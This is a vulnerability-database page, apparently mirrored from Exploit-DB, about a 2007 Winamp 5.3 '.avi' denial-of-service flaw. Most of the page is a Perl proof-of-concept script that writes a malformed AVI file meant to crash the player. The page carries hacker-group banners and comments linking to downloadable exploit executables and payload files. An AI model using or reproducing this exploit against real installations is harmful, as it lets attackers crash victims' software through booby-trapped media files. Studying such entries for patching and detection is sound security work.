Winamp 5.33 - '.avi' Remote Denial of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056226 漏洞类型
发布时间 2007-04-23 更新时间 2007-04-23
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/3782
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl

# Winamp Buffer Overflow DOS Exploit (0-DAY)

# Testet:Ver 5.3

# Discoverd By = DeltahackingTEAM    Bug Found & Exploitet By /Farzad.Sharifi(Dr.Trojan)

# Risk = High

#Exploit(EXE) =http://www.deltahacking.net/exp/winamp.exe  

#Exploit(PL)  =http://www.deltahacking.net/exp/winamp.pl

#OverflowFile(Avi) =http://www.deltahacking.net/exp/Dr.Trojan.avi

# Winamp Media Player Download=>http://www.winamp.com/


{

    print "\n================================================================================\n";

    print "\                                DeltahackingTEAM \n";

    print "\                            Delta.Secure[A]Gmail.com\n";

    print "\                      Winamp Buffer Overflow DOS Exploit \n";

    print "\We Are:Dr.Trojan,H!v++,D_7j,Impostor,Vpc,LOrd, Dr.Pantagon..Tanks 4 Mr.Str0ke \n";
   
    print "\Http://Deltahacking.net & Http://DeltaSecurity.ir & Http://PersianWhois.com\n ";

    print "\    n-------------------Exploit Completed(File Create)!-------------------\n";

    print "\n================================================================================\n";

}

open(avi, ">./Dr.Trojan.avi");

print avi "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00".

print avi "\x4D\x54\x68\x64";

print avi "\x4D\x54\x68\x64";


print avi "\x4D\x54\x68\x64";


print avi "\x4D\x54\x68\x64";



print avi "\x4D\x54\x68\x64";

#0nLy Iran :X
#Farzad.Sharifi  

# milw0rm.com [2007-04-23]